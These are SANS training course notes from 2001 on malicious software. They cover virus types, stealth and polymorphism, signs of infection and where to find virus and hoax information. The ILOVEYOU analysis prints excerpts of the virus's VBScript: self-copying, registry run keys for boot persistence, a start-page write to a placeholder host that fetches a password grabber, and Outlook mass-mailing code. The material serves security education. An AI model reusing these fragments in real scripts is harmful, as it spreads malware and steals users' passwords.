Malicious Software
Picture this - the trade press is all abuzz with warnings of a new killer virus, Child of Chernobyl.
Recall that Chernobyl struck on April 26, 1999. In Korea alone, it affected as many as a million
computers, causing more than $250 million in damages. The boss has just come down with a
magazine article in hand and has told you to drop everything.
Malicious Software
Security Essentials
The SANS Institute
Encryption and Exploits - SANS ©2001 1
This course on Malicious Software is part of the SANS Security Essentials series.
Picture this - the trade press is all abuzz with warnings of a new killer virus, Child of Chernobyl.
Recall that Chernobyl struck on April 26, 1999. In Korea alone, it affected as many as a million
computers, causing more than $250 million in damages. The boss has just come down with a
magazine article in hand and has told you to drop everything. You have three days to ensure the
organization is ready before “Child of Chernobyl” day. Is this real or a hoax? What do you do to
find out? How do you meet the boss' demands to get anti-viral software installed and updated as
needed? Stay tuned for answers to these questions and more…
Of course this course isn’t going to solve all your problems if you suddenly get hit and have no plan
of action or procedures in place. So you are going to need to apply what you learn here.
5-1
Objectives
• Malicious code
• Virus and hoax information
• Virus types and methods
• Organizational AV policy
• Desktop anti-viral care and feeding
Malicious Software - SANS ©2001 2
At the completion of this course, the student will be familiar with these core concepts of anti-viral
protection.
What is malicious software? How does it spread? What are some of the characteristics of viruses?
What is the difference between a virus and a hoax? Where can I go to get more information on them?
Does my organization have an anti-viral policy? What does it say? Is it up-to-date?
What is anti-viral software?
What is involved in the care and feeding of desktop anti-viral software?
5-2
Malicious Software (Malware)
• Viruses
• Worms
• Trojan horses
• Malicious applets
• Majority Microsoft-specific
Malicious Software - SANS ©2001 3
Malware is a generic term for a number of different types of malicious code - viruses, worms,
Trojan horses, and malicious applets. First, we will define what these things are.
A virus is a piece of parasitic code (or program) written specifically to execute on behalf of the user
without the user's permission (or knowledge). It is parasitic in that it attaches itself to files (or boot
sectors) and then replicates, causing the spread to continue. Some viruses do little more than
replicate and serve as a nuisance; others can do serious damage, such as affecting programs or
degrading system performance (the virus payload). Never assume that a virus is harmless and leave
it intact. We will look at the various types of viruses in the slides to follow.
A worm is a self-contained program (or set of programs), that is able to spread functional copies of
itself to other computer systems (usually via a network). Host-computer worms are entirely
contained on their host computer. Host-computer worms that delete from one host upon propagation
to a new host are called rabbits - they ‘hop’ around a network. Some worms run in multiple parts
on many hosts. These worms are called network worms. A network worm with one coordinating
segment and many client sub-segments is termed an octopus! Note: Malicious code is called a
worm when it requires no specific action on the part of the user to enable infection and propagation.
It just spreads. If the code requires the user to open an email or load a screen saver or take some
other action, then it is called a virus.
Trojan horses are programs with an intended action that is not documented or revealed. Typically,
Trojan horses masquerade as some other harmless or trusted program. A well-known Trojan horse
is Back Orifice.
Malicious applets are applets that attack the local system of a web surfer and involve denial of
service, invasion of privacy, and annoyance. Malicious applets are distinguished from attack
applets that exploit vulnerabilities in the implementation of the Java security model.
It is interesting to note that of the 60,000 or so known viruses, worms etc., about 55,000 of them are
Microsoft-specific (Gene Spafford). Care is needed here because this statistic does not mean that
systems such as Linux, Unix, or Mac are immune - there are just less examples found here. We
usually think of infection via the network and floppy disks, but CDROMs are notorious for hosting
malware. Just think of the damage that could be done with a music CD. How about infecting a
Windows system just because auto-run is enabled?
5-3
Virus Types
• File infectors / Program viruses
– Direct action
– Memory resident
– Cluster or File system virus
• Potential to spread over networks
Malicious Software - SANS ©2001 4
Viruses are identified by the ways they infect computers. Usually, a virus falls into one of the
following three categories: Program viruses, boot record infectors, or macro viruses.
For the next few slides, we will focus on program viruses. A program virus gets activated when the
program is executed (or run). The virus is loaded into the computer memory and then proceeds to
wreak havoc. The results of the virus triggering may not be obvious immediately, as the virus may
have a built-in delay (an event-triggered virus). First signs of infection can include files being
saved with malformed or improper names.
Program viruses are usually attached to files such as COM or EXE files, but can infect any
executable or interpretable file - overlays, drivers, system files, or binary files. Examples also exist
of viruses that infect C source code, such that the compiled executable is infected!
Direct-action file infectors find one or more selected programs to infect each time the infected
program is run. Resident viruses install to the system service area of RAM and infect new programs
when they are run. Cluster viruses infect program files indirectly by modifying file system
structures, such as the file allocation table. These viruses are loaded by the OS before the target
program because the file system points to the virus first.
Program file viruses need to be executed to activate and spread. As well as being run locally, users
can run infected programs from servers, download and run infected files, or execute mail
attachments. These viruses therefore have the potential to spread from program to program on a
single host, and find their way to infect new programs on different hosts by being spread by network
users.
5-4
COM Program Infectors
COM program Prepended virus Appended virus
START VIRUS 1 JUMP
COM
COM
4 2
5
END 6
VIRUS
3
Malicious Software - SANS ©2001 5
Now we’ll take a look at how program files are actually infected.
COM file viruses attach themselves to their target in one of three ways - by prepending to the
beginning, by appending to the end, or by overwriting part of the file.
A prepending virus gains control when the first instruction of the infected COM file is executed.
The virus runs and then passes control to the original program. Because of this, users may not notice
anything different.
An appending virus writes an instruction to jump at the first instruction in the file. This jump will
take execution to the virus which later returns control to the COM program.
Overwriting viruses simply write their code to the beginning of the file. These viruses therefore
destroy the original program. More sophisticated overwriting viruses will make a copy of the portion
that they overwrite, which can later be executed - all in an effort to remain covert.
5-5
EXE Program Infectors
Original EXE Program Infected EXE Program
CS IP VCS VIP
Header SIZE SIZE+V
Load START START
Image
VIRUS START
CS IP
Malicious Software - SANS ©2001 6
Executables consist of two parts - the header and the load image. The header contains, among other
things, a pointer that points to the first instruction to be executed in the load image. The pointer
(CS:IP) consists of a pair of values - the code segment (CS) and instruction pointer (IP). A header
entry named SIZE stores the size of the load image.
When the executable is infected, these header entries are altered. CS:IP becomes VCS:VIP and now
points to the start of the appended viral code. SIZE increases to VSIZE and measures the size of the
infected load image. Running the infected program will cause a jump to the virus load image. When
completed, the viral code hands execution back to the original program.
5-6
Virus Types (2)
• Boot record infectors
– Floppy boot record (FBR)
– Master boot record (MBR)
– DOS boot sector (DBS or PBR)
– No network spreading potential
• Multipartite
– Potential to spread over networks
Malicious Software - SANS ©2001 7
The next virus we'll review is the boot infector. Every disk has a boot sector (regardless of whether
or not it is actually bootable). When a computer is powered up, it looks for boot information
according to a list provided by the computer BIOS. If any of the media in the drives specified in the
BIOS list have a boot sector virus, the infection will get transferred to the boot drive. Once the
infection is complete, the virus will get loaded into memory at startup. From there, the virus can be
spread to every disk that is read after startup. Results of the infection can range from nuisance (if at
all) to destruction of boot information, to a need for a complete format of the hard disk.
Floppy disks contain a floppy boot record (FBR) which can harbor a virus. If a system is booted
from such a floppy, the virus will load and infect the hard disk. Viruses on hard disks infect either
the master boot record (MBR) or the Partition boot record (PBR) (sometimes called the DOS boot
sector (DBS)). The MBR is the first place the BIOS looks when booting from a hard drive. If a
virus is present, it can seize control of the hardware before the operating system even sees the light
of day! PBR’s are executed after the bootstrap program in the MBR passes on control to the active
partition. Operating system files that are present on a partition are loaded according to instructions in
the PBR. Like the MBR infection, if a virus is present, it will be loaded before the operating system.
Multipartite viruses are hybrids of boot infectors and program viruses. When executed as a
program, boot sectors become infected, and vice versa - if multipartite-infected media are booted,
program files get infected. Multipartite viruses provide a mechanism by which boot-sector viruses
can get around on networks (they travel as program files). Boot-sector viruses cannot, on their own,
infect across networks. This is because the network protocols do not support sector level operations.
5-7
Virus Types (3)
• Macro viruses
– Targets are data files (e.g. *.doc)
– Written in ‘macro languages’ (e.g.
Melissa macro virus)
– Visual Basic Editor
• High network spreading potential!
Malicious Software - SANS ©2001 8
A macro virus is malicious code contained in a set of instructions that are included within an
application, such as a word processor or spreadsheet. Unlike program viruses, which target
executables, macro viruses target data files. Once the macro containing the infection is loaded onto
your computer, it can infect other files (such as the normal.dot template for Microsoft Word) or
cause itself to be propagated to other users automatically. A typical example is the Melissa macro.
It caused a document containing the macro to be mailed electronically to other email users.
The activated macro virus is limited only by the capabilities of the ‘macro language’ being used.
Microsoft macros, written in Visual Basic, can access all host application features (e.g. Word) and
many OS features (Windows). For example, in Word or Excel, try opening . This opens a Visual Basic session enabling complex macro design. Imagine the
potential damage from commands such as open, kill (delete), or rmdir!
Macro viruses can spread as email attachments. Users open an infected attachment, the virus reads
the address book, and mails itself on. For this reason, macro viruses have a huge potential to spread
over networks.
5-8
Virus Protection Techniques
• Stealthing
– virus attempts to hide or ‘cloak’ itself
– hiding from anti-virus software
– read stealthing
– size stealthing
• Need to scan memory to detect
Malicious Software - SANS ©2001 9
To avoid detection, or being picked up during an anti-virus scan, sophisticated viruses employ
techniques to cover their presence or tracks. When active, the virus builds itself a “cloaking device”.
Stealthing is achieved in a number of ways. The virus, through being memory resident (or hooked
into system services), monitors system function calls. When a system call is made, it is intercepted
by the virus and the virus tells a lie back to the system. In this way the system is deceived.
Read stealthing involves monitoring attempts to read or write infected files (e.g. open, read, or
close). If an infected program file is opened and read, the virus might give back to the system
information from a backed-up copy of the original file - the infection is invisible! Another form of
read stealthing monitors direct access to disk sectors. Even if low level calls are made to read the
master boot record (e.g. BIOS Interrupt 13), the virus will interject.
Size stealthing viruses monitor calls to directory entries and other parts of the file system. If the
operating system were to inquire as to the size of an infected file, the call is intercepted and a lie is
told.
Stealthing prevents or hinders detection by examining disks. Anti-virus scanning software must
therefore resort to scanning the system portions of RAM to detect these viruses.
5-9
Virus Protection Techniques (2)
• Polymorphism
– poly = many, morph = form
– encryption/decryption routines
– mutation engines
• Makes a scanner’s job a lot harder
Malicious Software - SANS ©2001 10
Now let's look at another protection technique - polymorphism. Polymorphism literally means many
forms. A polymorphic virus therefore has many and varying forms - very biological indeed. If a
virus is continually changing the way it looks, the job of the anti-virus scanner is made a lot more
difficult.
Viral polymorphism is achieved by using a mechanism that varies the code used to decrypt, or
unsheath, the virus into its active state. The inactive virus is encrypted so that it cannot be easily
detected by scanning for common strings (in fact, the code of the virus body will look like random
data).
If the encryption and decryption routines did not change from virus to virus, then a scanner could
detect the virus by detecting the decryption code. Therefore, polymorphic viruses change their
decryption routines on the fly. These changes might be made by a mutation engine built into the
virus that is linked to a random number generator. Alternatively, some mechanism might exist to
vary the sequence of instructions, or insert redundant instructions into the mutating routine. The
decryption routines still perform their functions, but the way they look is different.
The common cold is a biological example of viral polymorphism. However, the cold virus varies in
both form and function.
5 - 10
Other Virus Variations
– Fast and slow infectors
– Companion viruses
– Sparse infectors
– Cavity viruses
– Tunnelling viruses
– Armored viruses
– Retro viruses
– “In the wild”
Malicious Software - SANS ©2001 11
It is worthwhile taking a look at some other virus variations.
Fast infectors are memory-resident program viruses that not only infect programs that are executed,
but also those that are opened or accessed. The danger with this is the potential spread of infection
before the virus is detected. Imagine scanning (hence infecting!) 70% of all your files before you
detect the fast infector.
Slow infectors only infect files when they are created or modified. This is an attempt to avoid the
integrity checking or file monitoring capabilities of anti-virus software. A file changes when it is
modified, so this is a good time for a virus to conceal its actions.
Sparse infectors only infect occasionally (e.g. 1 in 10 files accessed).
Cavity viruses write themselves to redundant or null constant portions of a program file. In this
way, the file remains the same size and has the same function, but it is carrying the virus in a
‘cavity’.
Tunneling viruses bypass activity monitoring software by directly accessing interrupt handlers on
hardware controllers. For example, disks can be accessed by directly reading and writing the address
and data buses.
Armored viruses employ tricks to make analysis, such as tracing and disassembly, difficult.
Retro viruses are “anti-anti-virus”. These viruses set out to attack or hinder the software that detects
them. Retro viruses exist in nature, with the most infamous example being HIV, which attacks the
human immune system.
Finally, if a virus has been verified (by groups that track viruses) to have caused an infection in other
than a laboratory environment, it is described as 'in the wild'. A virus that has not been observed in
a real world situation (i.e., not in the wild) can be described as 'in the zoo'.
That ends our survey of virus types and modes of action.
5 - 11
ILOVEYOU Virus
• E-mail attachment
• Attempts to spread to Outlook
address book contacts
• Installs a password-grabbing
program
• Overwrites some files
Malicious Software - SANS ©2001 12
Now let’s examine the structure and mode of action of a recent virus - the ILOVEYOU virus.
On May 4, 2000, many computer users encountered mail with the subject stating, “ILOVEYOU”.
The mail body instructed users to “kindly check the attached LOVELETTER coming from me.”
History now says that many did not resist the temptation.
The attachment (named LOVE-LETTER-FOR-YOU.TXT.vbs), when opened, resulted in a script
being run that spread the same message to all contacts in all of the victim’s address books.
Typically, address books contain multiple entries. This means the virus amplifies after each new
infection.
The ILOVEYOU virus has two distinct parts to its payload - installation of a password grabber and
the overwriting of files.
The password grabber is installed by changing the startup page of the local browser to a web page
that will attempt to execute a program named WIN-BUGSFIX.exe - so named in an attempt to fool
users into clicking “yes” when asked if the executable should run. If run, the password grabber is
installed and set to run at boot time. Upon booting, it will ‘sniff’ user passwords when entered.
The virus also overwrites some files (e.g. vbs, vbe jpg, and mp3 files). These files are overwritten
with the virus code and are therefore infected. If these infected files are run, the infection will
propagate.
5 - 12
ILOVEYOU Analysis (1)
• Code is VBScript
• Interpreted by a scripting engine
• Five routines
– main()
– regruns()
– spreadtoemail()
– html()
– listadriv()
Malicious Software - SANS ©2001 13
A look at the virus code is instructive.
The ILOVEYOU virus is written in VBScript, and will therefore run on systems that have the
Windows Scripting Host (WSH) installed, or systems that interpret Visual Basic and have a Wscript
library. WSH is installed if you choose a standard installation of the operating system, or if you
install Internet Explorer 4 or 5, or if you download WSH from Microsoft. (Check and look for VBScript or Windows Script Hosting components). An
application that can be driven by a scripting engine is a scripting host.
The code consists of five routines and some supplementary support functions. The routines are:
main(), regruns(), spreadtoemail(), html(), and listadriv(). Each of these subroutines will be
examined in turn.
5 - 13
ILOVEYOU Analysis (2)
• Subroutine main()
– Copies virus script to multiple
locations
– Invokes the remaining routines
• Subroutine regruns()
– Adds Registry values to:
• execute the virus at boot time
• download a password-grabber and set it to run
at boot time
Malicious Software - SANS ©2001 14
The subroutine main(), exists to do two things: make copies of the virus in the system and windows
directories, and call the remaining subroutines.
Look at the following VBScript:
dim dirwin, fso, c
Set fso = CreateObject(“Scripting.FileSystemObject”)
Set dirwin = fso.GetSpecialFolder(0)
Set c = fso.GetFile(Wscript.ScriptFullName)
c.Copy(dirwin&”\Win32DLL.vbs”)
Even if you are not familiar with VBScript, you can still see that this language has the power to read
directories and create files. What more does a virus need? The code segment above starts by
declaring some variables, then declares a file system object, finds the system directory, gets the
name of the virus currently running and then copies this file to %system_folder%\Win32DLL.vbs -
which looks like a legitimate system file.
regruns() sets Registry keys to make the file created above run at boot time, changes the Internet
Explorer start page to load WIN-BUGSFIX.exe, and sets the Registry to execute this program at
boot time. These effects are illustrated with the following script examples:
Set regedit = CreateObject(“Wscript.Shell”)
regedit.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\RunServices\Win32DLL”, dirwin&”\Win32DLL.vbs”
regedit.RegWrite “HKCU\Software\Microsoft\Internet Explorer\Main\Start Page”,
“http://www.badpage/WIN-BUGSFIX.exe”
regedit.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run\WIN-BUGSFIX.exe”, tempdir&”\WIN-BUGSFIX.exe”
5 - 14
ILOVEYOU Analysis (3)
• Subroutine spreadtoemail()
• Spreads virus to users in each
address book
• Creates Registry keys such that
virus is not sent to the same
address more than once
Malicious Software - SANS ©2001 15
spreadtoemail() spreads the virus to all entries in the victim’s address book. Each address book is
found and each address is read in turn. A new mail object is then constructed and sent.
Set out = Wscript.CreateObject(“Outlook.Application”)
Set mail = out.CreateItem(0)
Set mailaddress = %script to get user from address book%
mail.Recipients.Add(mailaddress)
mail.Subject = “ILOVEYOU”
mail.Body = vbcrlf&”kindly check the attached LOVELETTER coming from me.”
mail.Attachments.Add(dirsystem&”\LOVE-LETTER-FOR-YOU.TXT.vbs”)
mail.send
spreadtoemail() also contains code to ensure that the virus is only sent to each address book entry
once. This is achieved by saving in the Registry, those who have been targeted already.
5 - 15
ILOVEYOU Analysis (4)
• Subroutine html()
– creates an html page to be sent over
IRC
– alternative mode of spreading
• Subroutine listadriv()
– overwrites specific files with the virus
– propagates infection
Malicious Software - SANS ©2001 16
The subroutine html() writes an html page that will be sent through Internet Relay Chat (IRC). The
web page contains Java script that creates a window and a VBScript that recreates the virus and
executes it. This provides another way for the virus to spread.
listadriv() looks for specific types of files and then infects these files. This is achieved by using
script functions such as GetFolder, GetExtensionName, OpenTextFile, write, and close. These
functions look dangerous and are dangerous!
Files that are overwritten are deemed infected. If these files are run at a later stage, the virus will be
executed yet again.
That ends our walk-through of the VBScript for the ILOVEYOU virus. One final point - the code
requires the user to open an email and run an attachment to be activated. For this reason,
ILOVEYOU is a virus. If no special actions were required by the user, it would be a worm. Many
sources refer to this piece of malware as a worm. A full analysis of the ILOVEYOU virus is
contained in the appendix. Note that this analysis refers to the program as a worm - probably
because it uses a network to spread, rather than disks or files. Look at the definitions of worms and
viruses and think about it. Take a look at the full analysis and understand just what the virus is
doing. After all, can we afford not to understand the enemy?
5 - 16
Indications of an Infection
• Computer runs slower
• Disk drive makes noise
• Running out of free space
• File sizes change
• Unexplainable files
• Characters dropping from screen
Malicious Software - SANS ©2001 17
The best way to detect and protect against viruses is to use a good anti-viral program. By the
way, no one program ever seems to pick up all viruses, but running two anti-virus programs at the
same time can be a recipe for disaster. Everyone I have talked with that has tried this in production
has been burned bad. One solution for organizations that have a disk scan facility at the physical
security desk is to run one brand of anti-virus to scan incoming disks and another entirely inside the
facility.
Not everyone uses anti-viral and people who do, don't always keep the signatures up-to-date. If
that's not enough, the virus programmers are continually writing new ones. What's a guy to do?
Look for signs of anomalous activity. This slide shows some of the symptoms you might observe.
Here are some of the comments you might hear:
"My system seems slower than normal."
"My disk drive makes a lot of noise."
"The disk drive light is on a lot of the time."
"I keep running out of free space."
There are other indications, but you get the idea - the computer is behaving in a different
manner. At this point, I should mention that these indications, in and of themselves, do not
constitute an infection.
I bought a brand new shiny computer in December 1996. It had a massive 2 GB hard disk, and
a whopping 16 MB of RAM and came bundled with Windows 95. I added anti-viral software,
Microsoft Office, a browser, and a few other goodies. Two and a half years later, after I had been
updating patches and hot fixes to both the operating system and the applications (as well as anti-viral
signatures), I noticed that it seemed to take longer and longer to bring up my desktop and files I
wanted to edit. To cut to the chase, I was not infected. The updates and newer programs had simply
become much larger to the point that I simply didn't have enough RAM in the computer to get
decent performance. After I added 32 MB of RAM, the system worked MUCH better. There are
two morals to this story: (1) just because your computer shows one of the indications above, it does
not mean that your are infected; (2) while more memory is usually a good thing, it will not cure a
viral infection.
5 - 17
What to do if You’re Infected
• Contain the problem
• Fix it
• Share your experiences with others
Malicious Software - SANS ©2001 18
If you see the signs above and don't have a current anti-viral program installed, what should you do?
First, DO NOT PANIC. Contain the problem by isolating the computer system (unplug the network
cable, leave the system powered up, and do not use it). If you are not the system administrator,
contact that person and ask for help.
Second, fix the problem. Install current anti-viral software and either clean up the problem OR verify
that you are not infected and move onto solving whatever is causing the symptoms you identified.
Third, share your experience. Tell others what happened, how you corrected it, and what you
learned. Even if you were mistaken and are embarrassed by it, you might prevent someone else from
making the same mistake if you let them know what you did.
5 - 18
Virus and Hoax Information
http://www.cert.org
http://www.symantec.com
http://www.antivirus.com
http://nai.com
http://www.icsa.net
Malicious Software - SANS ©2001 19
What we've discussed so far can be overwhelming. You certainly can't hear everything you might
ever need to know about viruses in a single webcast, so let’s go to the next slide (Virus and Hoax
Information) to see some of the resources that are available on the web if you want or need more
information on viruses and hoaxes.
CERT is the home of the Computer Emergency Response Team located at Carnegie-Mellon
University. When you use this link, go to the site map and scroll down to the section entitled "Other
Sources" to get to the virus information.
Symantec is the home of Norton AntiVirus (as well as other software packages with the Norton
name). This is a very informative site.
Antivirus.com is where you will find the TrendMicro site. You can go to housecall.antivirus.com
and request a free online scan of your system.
NAI is short for Network Associates, Incorporated. It’s the home of McAfee anti-viral software, as
well as a wealth of information on viruses.
ICSA is the International Computer Security Association (formerly the National Computer Security
Association) - yet another good source of virus and anti-viral information. The site has been
revamped and you’ll be relocated to trusecure.com.
5 - 19
Virus and Hoax Information
(2)
• Viruses
– http://www.virusbtn.com
• Hoaxes
– http://www.vmyths.com
– http://www.hoaxkill.com
Malicious Software - SANS ©2001 20
This slide lists some additional resources for both topics.
The first is the home of the Virus Bulletin. The link shown claims to be "THE INTERNATIONAL
PUBLICATION ON COMPUTER VIRUS PREVENTION, RECOGNITION, AND REMOVAL.” A useful
site, though this bulletin is available only by paid subscription.
The next two links shown (kumite and hoaxkill) are places you can go to get information on hoaxes. I mention
these because there are a number of "viruses" reported which are not really viruses. They cause a tremendous
'denial of service' condition when folks unwittingly forward the hoax information to friends and co-workers
with the admonition, “If you see this, delete it and don't open it - it will format your hard drive!” (or something
similar to this). If you get a notice such as this, please check it out with a knowledgeable source before you
forward it.
This concludes the overview of virus types, characteristics, activation mechanisms, indications of an infection,
and what to do if you are infected. We also covered (very briefly) hoaxes and where to go to get more
information. Let's now pursue how you go about getting effective anti-viral protection implemented in your
organization.
5 - 20
